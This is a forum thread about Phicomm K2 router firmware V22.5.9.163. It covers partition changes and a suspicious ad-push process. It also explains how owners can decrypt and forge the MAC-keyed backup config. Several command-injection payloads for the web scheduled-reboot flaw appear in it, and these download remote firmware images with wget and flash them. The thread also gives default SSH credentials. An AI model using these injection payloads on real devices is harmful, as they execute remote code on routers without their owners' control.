QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

关于K2官网最新固件K2_V22.5.9.163的说明及净化、精简、去广告版本

火.. [复制链接]

昨天K2官网发布了最新固件【V22.5.9.163】,下载研究了下。

一、现在已经刷了第三方固件,如何升级官方固件?

先用breed刷【此贴】中的V1.0版本(firmware_k2_v10.bin),然后启动后在“手动升级”页面升级官方固件即可。

注意:升级会重写uboot,破坏breed

二、新固件有哪些变化?

1、WEB页面定时重启的漏洞还在,你可以利用此漏洞安装breed、ssh或运行任何命令,可以参考【此文

2、新固件MTD分区改变,直接导致breed不兼容新固件,新固件如果刷breed会导致无法启动,需【修改breed配置

3、由于固件地址变化,后续如果想刷新固件的修改版本,不能直接使用目前的breed,需启动后使用MTD命令或WEB升级

4、新固件去除了购物比价,但增加了一个adpush进程(广告推送?),目前不知其用途,内存占用较高

5、新固件由于MTD分区变化,用户可用空间由1M变为512K,不利于固件定制,好消息是新内核支持ipset了

三、新固件的一些信息参考

MTD分区、可用空间及启动后的内存占用:

各分区地址(firmware起始地址从以前的0x50000变为0xa0000,导致breed不兼容):

可疑进程:

可疑网络进程:

四、配置文件破解方法
利用配置文件备份恢复可以进行破解,不过目前版本对配置文件使用了WAN口MAC地址作为加密条件
具体的加解密程序为/usr/bin/encryconfig

程序中有读取硬件WAN口的MAC地址操作:
eth_mac r wan > /tmp/macstr

加密语句:
openssl aes-128-cbc -k "%08X" -base64 -in %s -out %s

这样就要求一台K2一个dat文件,所以你要对配置文件做下处理:
1、下载下面的文件

2、找一台能用ssh的K2(版本最好在22.4.5.39以后),用winscp将上个文件解压后传至/tmp目录
3、如果是要生成本台K2所用的dat,直接输入命令
encryconfig encrypt /tmp/k2 /tmp/k2.dat
将k2.dat拷贝出来,用此配置文件恢复配置即可
4、如果是要生成其他K2所用的dat文件,先输入命令
eth_mac r wan
查看本机MAC并记下,然后查看你要生成配置的K2 MAC(WEB中可找到),然后改变本机MAC为目标MAC,比如改为CC 81 DA 22 33 44
eth_mac w wan CC 81 DA 22 33 44  
然后再运行
encryconfig encrypt /tmp/k2 /tmp/k2.dat
此k2.dat即为目标K2所用的配置恢复文件
记得弄完后恢复本机的MAC为记下的MAC

dat使用方法:
在成功升级为V22.5.9.163后,用dat文件进行“备份恢复”

恢复后K2会重启两次,请耐心等待

成功启动后,会显示为净化版本:

净化版本去除了可疑程序,添加了ssh(用户名root 密码admin)

远程APP管理缺省禁止,可以在“远程管理”菜单打开,如开启不了多刷新几次浏览器

注:打开APP远程管理有一定的数据泄漏风险!

五、WEB漏洞破解法

上面的操作有点复杂,好处是你可以给小白用户一个dat文件,然后他直接恢复备份即可。

如果你会使用WEB漏洞来执行命令,有一个更加简单的方法。

利用WEB漏洞(参考文章)输入如下命令即可变为净化版本:
05|wget http://iytc.net/tools/k2_clear.bin -O /tmp/k2_clear.bin;sleep 1;sysupgrade -r /tmp/k2_clear.bin;sleep 1;reboot

输入如下命令可以变为精简版本(精简版本在净化版本上去除了ssh,内存占用更少):
05|wget http://iytc.net/tools/k2_min.bin -O /tmp/k2_min.bin;sleep 1;sysupgrade -r /tmp/k2_min.bin;sleep 1;reboot

输入如下命令可以变为adbyby去广告版本(在精简版本上增加adbyby去广告,缺省关闭,在广告屏蔽页面打开):
05|wget http://iytc.net/tools/k2_adbyby.bin -O /tmp/k2_adbyby.bin;sleep 1;sysupgrade -r /tmp/k2_adbyby.bin;sleep 1;reboot

执行后K2会复位两次,请耐心等待。

上述的净化、精简、去广告版本在恢复出厂设置后会失效,变为纯正的官方版本,如想切换,需再在WEB上输入上述的命令。

官方原始版本和精简版本的内存占用及网络进程对比图:

启动后,精简版本比官方版本多了近2M的空闲内存。

如果你想要刷后续的官方定制固件,请输入如下命令变为可升级版本(在去广告版本上增加升级定制固件功能):
05|wget http://iytc.net/tools/k2_update.bin -O /tmp/k2_update.bin;sleep 1;sysupgrade -r /tmp/k2_update.bin;sleep 1;reboot

升级后会显示“定制版本”号为“V0.0”:

后续可在“手动升级”菜单升级定制固件(注:只能刷163版本的定制固件):

定制固件下载请参考【此贴

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

精简版还是可以用ssh登陆啊  发表于 2017-3-4 14:10

评分

coolwjl + 1 我来恩山就是为了看你!
hua_wuxin + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
huserszm + 1 支付宝已转500w给你!
阿非 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
lon91ong + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
qq8083666 + 1 亲,你这么厉害,我想做你的经纪人!
放肆小恋人 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
wzb1988 + 1 支付宝已转500w给你!
music775775 + 1 楼主威武—我就想问问挖掘机技术哪家强?
zbbenben + 1 我来恩山就是为了看你!
haha20152016 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~

我的恩山、我的无线 The best wifi forum is right here.

希望尽快发布支持22.5.X.X新版本的breed就好了!

然而做bread的大神不是说不跟新了吗,估计玄  详情 回复 发表于 2017-3-9 07:47
我的恩山、我的无线 The best wifi forum is right here.

帮abccba94点个赞,这么早就起来分析新官方件了,稳定(可自行做加减法)的官方修改版本,我就认准这个牌子了

不太懂,但得赞一个

顶一个。。。。

期待大神来修改一下,稳定就是最好。

期待大神来修改一下,稳定就是最好。

不明觉厉,哈哈。。。。

收藏  备用

用户空间变小,不是什么好事

支持楼主 感谢楼主

昨晚再次刷入1.4,丝般顺滑 感谢abc

支持研究,谢谢分享!!

看来还是不刷好,刷后想用breed
就麻烦些了。

先刷入新固件,之后用原来的方式来安装不死,刷入tianbaoha大大做的不死备份,利用修改EEPROM登录telnet登录路由,用dd命令复制出固件,之后修改完打包回去bin,用MTD命令刷入即可

不用这么麻烦了,可以用配置文件来破解,已经找到方法  详情 回复 发表于 2017-2-25 14:15